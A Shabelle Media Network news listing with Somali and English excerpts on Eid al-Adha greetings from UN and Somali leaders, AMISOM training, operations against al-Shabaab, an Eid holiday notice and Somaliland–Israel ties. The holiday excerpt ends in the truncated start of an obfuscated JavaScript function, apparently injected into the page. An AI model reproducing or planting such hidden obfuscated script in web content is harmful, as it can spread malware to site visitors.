Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

QM oo hambalyada Ciidul Adxa u dirtay Ummadda Soomaaliyeed

War saxaafadeed ka soo baxay Xafiiska Wakiilka Gaarka ah ee Xoghayaha Guud ee Qaramada Midoobay u qaabilsan Soomaaliya Danjire James Swan ayaa hambalyo ku aaadan muanasabadda ciidul Adxaa u diray shacabka Soomaaliyeed. Bahda Qaramada Midoobay ee Soomaaliya waxay dhammaan Soomaalida u rajaynayaan “Ciid Wanaagsan.” “Hambalyo diirran oo ku aaddan Ciidul Adxaa ayaa idin kaga imaanaysa bahda Qaramada Midoobay ee Soomaaliya,” ayuu...

Rooble oo shacabka Soomaaliyeed ugu hambalyeeyey munaasabadda ciidul Adxa

Ra’iisul Wasaaraha Xukumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa  Shacabka Soomaaliyeed ugu Hambalyeeyay munaasabadd Ciidul Adxa oo berri ku beegan. “Dhamaan shacuubta Islaamka, gaar ahaan shacabka Soomaaliyeed meelkasta oo aad joogtaan waxaan rabaa inaan halkan idinkaga hambalyeeyo ciida barakeysan ee ciidul Adxa, waxaan idin leeyahay ciid wanaagsan”. ayuu yiri Ra’iisul Wasaare Rooble. Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen...

Farmaajo oo ugu hambalyeeyay shacabka Soomaaliyeed Ciidda Carafo

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa hambalyo ku aaddan Ciidda Carafo u diray Shacabka Soomaaliyeed iyo Muslimiinta Caalamka ee u dabbaal-degaya farxadda Ciiddan. Madaxweynaha ayaa tilmaamay fadliga ay leeyihiin maalmahan barakaysan ee Ciidda Carafo, waxa uuna ku bogaadiyey dadka Soomaaliyeed in ay is kaalmeeyaan, kana shaqeeyaan danta guud oo amnigu uu ugu horreeyo. “Waxaan ku boorrinayaa dadka Soomaaliyeed,...

AMISOM and SNA officers conclude training on civil-military cooperation

Officers serving under the African Union Mission in Somalia, AMISOM, and the Somali National Army, SNA, have completed a five-day joint training to enhance their knowledge on the role of Civil-Military Cooperation, CIMIC, in peace support operations. The five-day training, organised by the AMISOM Force Headquarters in coordination with the UK-Mission Support Team, UK-MST, was attended by CIMIC officers from...

Somali army kills militants in Jubaland

The Somali National Army (SNA) said Monday that its elite Danab forces killed 15 Shabab militants and injured several others in the country's southern Lower Juba region. "Our forces killed 15 Shabab militants, injured others and destroyed several hideouts in Lower Jubba region," SNA spokesman Ali Hashi Abdi told journalists in Mogadishu. Such operations will be sustained against Shabab terrorists in...

Galmudug oo war kasoo saartay dagaallada ka socda gobolka Mudug

Warsaxaafadeed ka soo baxay wasaaradda amniga dowlad goboleedka Galmudug ayaa waxaa looga hadlay dagaallada weli ka socda gobolka Mudug ee bartamaha Soomaaliya. Qoraalka wasaaradda ayaa waxaa lagu sheegay in shantii maalin ee lasoo dhaafay ciidamada Xoogga iyo kuwa Galmudug ay howl-gallo ka wadeen koonfura gobolkaasi. Sidoo kale wasaaradda ayaa shaacisay in howl-galladaasi khasaare iyo jab xoogan lagu gaarsiiyey dagaalyahanada Xarakada Al-Shabaab,...

AMISOM oo tababar usoo xirtay saraakiil ka tirsan Xoogga dalka

Saraakiisha Howlgalka Midowga Afrika ee Soomaaliya, AMISOM iyo Ciidanka Xoogga Dalka ayaa loo soo gabagabeeyay tababar wada-jir ah oo soconayay muddo shan maalmood ah kaasoo kor loogu qaado aqoontooda ku aaddan doorka Iskaashiga Rayidka iyo Milatariga, ee howlaha taageerada nabadda. Tababarka oo ay soo qabanqaabisay Xarunta Dhexe ee Ciidamada AMISOM oo lala kaashanayo UK ayaa waxaa ka soo qeybgalay saraakiisha...

Faah faahino kasoo baxaya dagaal ka dhacay gobolka Mudug

Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay dagaal culus oo u dhexeeyey ciidamada Xoogga dalka, kuwa Galmudug oo isku dhinac ah iyo Al-Shabaab oo ka dhacay deegaano dhac koonfurta gobolka Mudug ee bartamaha wadanka Soomaaliya. Dagaalka ayaa ka qarxay tuulada Qeycad oo u dhaxeysa deegaanada Bacaadweyne iyo Shabeelow ee gobolkaasi, sida ay sheegeen saraakiil ka tirsan ciidamada dowladda. Sidoo...

DF oo fasaxday dhammaan shaqaalaha Soomaaliyeed

Wasaaradda Shaqada iyo Arrimaha Bulshada Jamhuuriyadda Federaalka Soomaaliya  oo Ummadda Soomaaliyeed waxay ugu hambalyeenaysa munaasabadda Ciidul Adhxaa. Wasaaradda ayaa shaacisay in Dhamaan Shaqaalaha Dowladda iyo kuwa gaarka ah ay fasax yihiin Seddex maalmood oo ka bilaawaneysa maalinta Talaadada ah oo noqoneyso maalinta kowaad ee Ciidul Adxaa. Wasaaradda ayaa Shaqaalaha Soomaaliyeed u rajeysay inay farxad kula ciidaan qoysaskooda. Halkan hoose ka aqriso:-   function _0x3023(_0x562006,_0x1334d6){const...

OGEYSIIS: DEEQDA WAXBARASHO EE HORMUUD TELECOM (HTSP)

                                                  OGEYSIIS MUHIIM AH                            DEEQDA WAXBARASHO EE HORMUUD TELECOM (HTSP) Hormuud Salaam Foundation waxay ogaysiinaysaa Ardayda ka baxday Dugsiyada Sare, gaar ahaan sanad dugsiyeedka...

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...